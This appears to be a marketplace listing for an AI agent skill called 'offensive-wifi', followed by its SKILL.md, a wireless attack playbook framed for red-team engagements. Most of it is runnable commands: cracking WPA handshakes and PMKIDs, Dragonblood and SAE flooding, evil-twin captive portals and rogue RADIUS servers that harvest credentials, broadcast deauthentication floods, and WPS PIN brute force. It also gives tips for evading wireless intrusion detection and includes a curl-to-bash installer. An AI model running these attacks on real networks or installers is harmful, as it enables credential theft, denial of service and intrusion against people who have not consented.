offensive-wifi
Wireless / 802.11 attack methodology for red team engagements and wireless security assessments. Covers monitor-mode setup, WPA/WPA2-PSK handshake capture and PMKID attacks, WPA3 SAE downgrade and Dragonblood, WPA-Enterprise (EAP) attacks (MSCHAPv2 cracking, EAP-TLS cert theft, evil-twin RADIUS), Karma / Known Beacons / Mana evil twin attacks, captive-portal phishing, KRACK and FragAttacks, WPS Pixie Dust, deauthentication and disassociation attacks, rogue AP construction (hostapd-mana), 802.1X bypass, MAC randomization defeat, BLE/Zigbee/IEEE 802.15.4 sidebands, and Wi-Fi 6/6E/7 considerations. Use when scoping wireless pentest, war-driving an estate, or testing corporate wireless segmentation.
适合你,如果负责企业无线安全评估或红队无线攻击测试
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
~/.claude/skills/(项目级 .claude/skills/)~/.codex/skills/npx oh-my-skill add snailsploit/claude-red/offensive-wificurl -fsSL https://oh-my-skill.com/install.sh | bash -s -- snailsploit/claude-red/offensive-wifinpx oh-my-skill verify snailsploit/claude-red/offensive-wifi怎么用
技能原文 SKILL.md
Wireless / 802.11 — Offensive Testing Methodology
Quick Workflow
- Pick the right adapter (monitor mode + injection + correct band/PHY for target)
- Recon airspace passively — never deauth before you know the topology
- Choose attack: handshake capture, PMKID, evil twin, KARMA, or WPS
- Crack offline; do not rely on online dictionary attacks
- If WPA-Enterprise, pivot through stolen creds or rogue RADIUS
Hardware & Adapter Selection
| Chipset | Strengths | Notes | |---------|-----------|-------| | Atheros AR9271 (Alfa AWUS036NHA) | Solid 2.4 GHz monitor + injection | 802.11n only | | Realtek RTL8812AU (AWUS036ACH) | Dual-band, injection | Driver: aircrack-ng/rtl8812au | | MediaTek MT7612U (AWUS036ACM) | Stable dual-band | Modern kernels in-tree | | MediaTek MT7921AU | Wi-Fi 6 monitor (limited) | Patched drivers required | | AWUS036AXML / AXM | Wi-Fi 6E (6 GHz) | Bleeding edge — verify per release |
# Verify monitor + injection sudo airmon-ng check kill sudo airmon-ng start wlan0 sudo aireplay-ng --test wlan0mon iw list | grep -A 8 "Supported interface modes"
Reconnaissance
# Multi-channel discovery (all bands) sudo airodump-ng wlan0mon --band abg # Targeted on a known channel/BSSID sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon # Hidden SSID — wait for client probe or force deauth sudo airodump-ng -c 6 --essid-regex "." wlan0mon # Wigle / Kismet for war-driving kismet -c wlan0mon
Key data to record: BSSID, ESSID, channel, encryption, PMF status, client list, RSSI, vendor OUI.
WPA / WPA2-PSK
Four-way Handshake Capture
# Targeted capture sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon # Force a reconnect (deauth one client, do not blanket the AP) sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
Verify the EAPOL frames are usable:
hcxpcapngtool -o hash.hc22000 handshake-01.cap
PMKID (No Client Required)
PMKID lives in the first AP-to-station message — you can grab it without anyone connected.
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \ --enable_status=1 --filterlist_ap=targets.txt --filtermode=2 hcxpcapngtool -o hash.hc22000 pmkid.pcapng
Cracking
# GPU dictionary attack hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule # Mask attack (e.g. carrier defaults: 10 digits) hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d # Known SSID-based defaults (e.g. UPC, Sky, BTHub generators) upc_keys ESSID | hashcat -m 22000 hash.hc22000 -
WPA3 / SAE
Transition-Mode Downgrade
If the AP advertises both WPA2 and WPA3 (transition mode), force clients onto WPA2 by spoofing an RSN-only beacon and capturing as PSK.
Dragonblood (CVE-2019-9494/9495/13377)
Side-channel and downgrade attacks on SAE. Older hostapd (<2.10) with insufficient curve diversification leaks password elements via timing/cache attacks.
# Reference implementation git clone https://github.com/vanhoefm/dragonblood python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon
SAE Auth Flooding (Resource Exhaustion)
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024 # Triggers heavy crypto on AP CPU; can DoS lower-end deployments
WPA-Enterprise (802.1X / EAP)
Method Identification
# Watch initial EAP-Request/Identity to fingerprint method tshark -i wlan0mon -Y "eapol || eap" -V
| Inner Method | Attack | |--------------|--------| | EAP-MSCHAPv2 (PEAP/TTLS) | Crack NetNTLMv1-style challenge offline | | EAP-GTC | Cleartext password — capture via rogue RADIUS | | EAP-TLS | Steal client cert (often in user keychain / DPAPI / NDES) | | EAP-PWD | Dragonblood-class side channels |
Evil-Twin RADIUS (MSCHAPv2 / GTC)
# eaphammer — automated rogue AP + RADIUS eaphammer -i wlan0 --essid CorpWiFi --bssid AA:BB:CC:DD:EE:FF \ --auth wpa-eap --creds # Captured hashes → asleap or hashcat -m 5500 asleap -C challenge -R response -W wordlist.txt
Critical: organizations that don't pin server cert + CN on supplicants are vulnerable. Win10/11 with ServerValidation disabled (common for BYOD) will hand over creds.
EAP-TLS Cert Theft Paths
- DPAPI master key + cert blob from user profile (
%APPDATA%\Microsoft\SystemCertificates) - NDES misconfig (ESC8-class cert request abuse)
- ADCS user auto-enrollment template with weak ACL
WPS
Pixie Dust (Offline)
# Capture WPS exchange reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv # Or bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon
Vulnerable chipsets: Ralink, Realtek, Broadcom (older firmware), MediaTek (specific revs). Pixiewps recovers PIN in seconds when nonces are predictable.
Online PIN Brute (Last Resort)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -L -N -d 15 -t 30 -T .5 -r 3:30 # Most modern APs lock out after a few failures — slow and noisy
Evil Twin / KARMA / Mana
Stock Evil Twin (Captive Portal)
# wifiphisher — automated AP + phishing portal sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd # airgeddon — interactive menu (good for one-off engagements) sudo airgeddon
KARMA / Mana (Probe Exploitation)
Older stations broadcast PNL (Preferred Network List) probes. KARMA replies "yes" to anything; Mana picks one realistic ESSID and answers consistently to defeat MAC randomization.
# hostapd-mana sudo hostapd-mana ./mana.conf # Combine with rogue RADIUS for enterprise nets eaphammer -i wlan0 --known-beacons --known-ssids-file ssids.txt \ --auth wpa-eap --creds --hostile-portal
MAC Randomization Defeat
iOS/Android randomize MACs but leak per-SSID stable IDs. Cluster probes by sequence number and timing to re-identify devices.
KRACK & FragAttacks
| Attack | Class | Target | |--------|-------|--------| | KRACK (CVE-2017-13077..082) | Key reinstallation | Unpatched WPA2 supplicants | | FragAttacks (CVE-2020-24586..588) | Fragmentation/aggregation | Most pre-2021 implementations |
Test a network's patch status:
# Vanhoef test scripts git clone https://github.com/vanhoefm/krackattacks-scripts ./krack-test-client.py git clone https://github.com/vanhoefm/fragattacks ./test-fragattacks.py wlan0
Deauth / Disassociation Attacks
# Single client deauth (use for handshake capture) aireplay-ng --deauth 3 -a AP -c CLIENT wlan0mon # Broadcast (DoS — only with explicit authorization) mdk4 wlan0mon d -B target_bssids.txt # Disassoc + auth flood combo (kicks then prevents reconnect) mdk4 wlan0mon a -a AP_BSSID -m
802.11w (PMF) blocks unencrypted deauth. Most modern enterprise APs require it. Clients without PMF support are still kickable via Action frames.
802.1X / Wired NAC Bypass (Adjacent)
# Sniff valid 802.1X exchange on wired side tcpdump -i eth0 -w nac.pcap ether proto 0x888e # silentbridge / nac_bypass — transparently bridge through an authenticated host git clone https://github.com/s0lst1c3/silentbridge silentbridge --takeover --phy wlan0 # variants for wired
Wi-Fi 6 / 6E / 7 Considerations
- 6 GHz (Wi-Fi 6E) disables WPA2-only; WPA3 + PMF mandatory. Many attacks are mitigated by spec.
- OFDMA / MU-MIMO: legacy injection often misaligns with RU allocations — verify packet delivery on test bench.
- TWT (Target Wake Time): deauth windows differ; observe BA sessions before injecting.
- MLO (Wi-Fi 7): a single client over multiple links — capture must cover all links to recover full session.
Sidebands & Adjacent Wireless
| Tech | Tool | Notes | |------|------|-------| | Bluetooth Classic | redfang, crackle, btproxy | LMP/L2CAP fuzzing | | BLE | bettercap, Sniffle (TI CC1352), Frontline | GATT enumeration, LE Secure Connections downgrade | | Zigbee / 802.15.4 | KillerBee, apimote, ATUSB | Touchlink commissioning abuse | | Z-Wave | Z-Force, EZ-Wave | S0 key reuse bug class | | LoRa / LoRaWAN | LoRaPWN, ChirpStack | Join-request replay, ABP key reuse | | 433/868 MHz (Sub-GHz) | HackRF / Flipper Zero | Garage doors, doorbells, telemetry |
RADIUS / Backend Pivots Post-Compromise
# If you crack a domain user via PEAP-MSCHAPv2, pivot to AD nxc smb dc -u captured_user -p cracked_pass --pass-pol # If RADIUS server is stand-alone (FreeRADIUS), check users file & MOTP secrets # If on Windows NPS, pivot via the service account context
Engagement Cheatsheet
# 1. Setup sudo airmon-ng check kill && sudo airmon-ng start wlan0 sudo iw reg set US # 2. Recon (do not deauth yet) sudo airodump-ng wlan0mon --band abg --write recon # 3. PMKID sweep (passive) sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 # 4. Targeted capture if PMKID empty sudo airodump-ng -c <ch> --bssid <AP> -w cap wlan0mon & sudo aireplay-ng --deauth 3 -a <AP> -c <client> wlan0mon # 5. Crack offline hashcat -m 22000 hash.hc22000 wordlist.txt -r best64.rule # 6. If enterprise → eaphammer evil twin # 7. Document SSID, BSSID, channel, RSSI, encryption, attack used, time
Detection / Defender View
| AP/WIDS Detector | Trigger | Evasion | |------------------|---------|---------| | Excessive deauth | >5 deauth/sec from one source MAC | Spread across spoofed MACs, target individuals | | Rogue AP detection | Unauthorized BSSID on monitored channel | Match real BSSID's beacon timing/IE order exactly | | Karma response anomaly | AP answering all probe SSIDs | Use Mana mode, pick one plausible SSID | | WPS lockout | Repeated PIN failures | Pixie Dust offline only, abandon online brute | | RADIUS log: cert mismatch | Supplicant rejects evil-twin cert | Use copies of victim CA-signed certs (unlikely) |
Key References
- MITRE ATT&CK: T1200 (Hardware Additions), T1557.004 (AiTM via Evil Twin)
- IEEE 802.11-2020 (combined spec including KRACK mitigations)
- WPA3 Spec / Wi-Fi Alliance: dragonblood.net for vuln tracking
- hcxtools / hashcat WPA modes: docs at hashcat.net
- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md